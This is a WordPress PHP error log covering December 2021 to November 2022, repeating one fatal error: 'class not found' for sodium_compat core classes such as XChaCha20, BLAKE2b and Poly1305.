/home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [02-Dec-2021 06:59:05 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [02-Dec-2021 16:23:25 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [03-Dec-2021 06:05:48 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [04-Dec-2021 07:34:55 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [04-Dec-2021 23:15:43 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [11-Dec-2021 02:20:03 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [20-Dec-2021 16:20:20 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [20-Dec-2021 19:08:55 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [20-Dec-2021 23:46:18 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [30-Dec-2021 21:35:59 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [03-Jan-2022 00:27:52 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php on line 4 [03-Jan-2022 15:29:40 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [14-Jan-2022 01:20:21 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [07-Feb-2022 02:49:12 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [07-Feb-2022 04:12:16 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php on line 4 [09-Feb-2022 12:40:35 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [10-Feb-2022 00:46:20 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [11-Feb-2022 21:15:58 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [12-Feb-2022 02:15:07 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [12-Feb-2022 09:09:48 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [07-Mar-2022 03:24:42 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [12-Mar-2022 03:44:34 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [16-Mar-2022 11:17:33 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [18-Mar-2022 03:29:35 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [19-Mar-2022 18:34:59 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [21-Mar-2022 18:19:11 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [30-Mar-2022 12:04:17 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [16-Apr-2022 01:34:44 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [17-Apr-2022 22:17:20 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [23-Apr-2022 12:23:33 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [26-Apr-2022 09:25:22 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [26-Apr-2022 18:05:50 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [09-May-2022 01:28:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [14-May-2022 03:20:34 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [19-May-2022 06:10:33 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [23-May-2022 00:07:10 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [26-May-2022 01:01:57 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [21-Jun-2022 07:53:55 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [21-Jun-2022 18:41:37 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [27-Jun-2022 19:06:51 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [02-Jul-2022 05:38:00 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [05-Jul-2022 05:38:25 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [05-Jul-2022 07:29:35 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [09-Jul-2022 20:34:10 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [17-Jul-2022 09:27:59 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [20-Aug-2022 10:48:54 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [09-Sep-2022 14:24:37 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [10-Sep-2022 02:44:59 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [11-Sep-2022 15:54:14 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [11-Sep-2022 21:41:32 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [13-Sep-2022 15:27:58 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [14-Sep-2022 17:20:46 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [15-Sep-2022 09:24:48 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [16-Sep-2022 12:57:06 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [17-Sep-2022 18:24:39 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [19-Sep-2022 06:45:12 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [19-Sep-2022 23:46:14 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [20-Sep-2022 14:37:03 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [20-Sep-2022 15:34:08 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [29-Sep-2022 03:05:11 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [30-Sep-2022 14:42:12 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [30-Sep-2022 21:04:45 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [11-Oct-2022 06:46:16 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [11-Oct-2022 14:18:55 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [14-Oct-2022 11:01:16 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [15-Oct-2022 01:11:24 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [18-Oct-2022 16:44:24 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [18-Oct-2022 16:51:02 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [19-Oct-2022 16:03:15 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [19-Oct-2022 22:25:16 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [20-Oct-2022 21:31:24 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [21-Oct-2022 02:47:29 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [23-Oct-2022 23:05:40 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [29-Oct-2022 03:08:30 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [29-Oct-2022 06:47:58 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [29-Oct-2022 08:19:34 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [29-Oct-2022 20:28:50 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [30-Oct-2022 11:43:55 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [01-Nov-2022 09:54:30 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [01-Nov-2022 19:41:57 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [02-Nov-2022 10:33:54 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [02-Nov-2022 16:10:05 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [06-Nov-2022 08:15:51 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [07-Nov-2022 21:01:00 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [09-Nov-2022 15:51:17 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [11-Nov-2022 07:58:37 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [12-Nov-2022 08:10:46 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [14-Nov-2022 14:56:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [14-Nov-2022 20:26:58 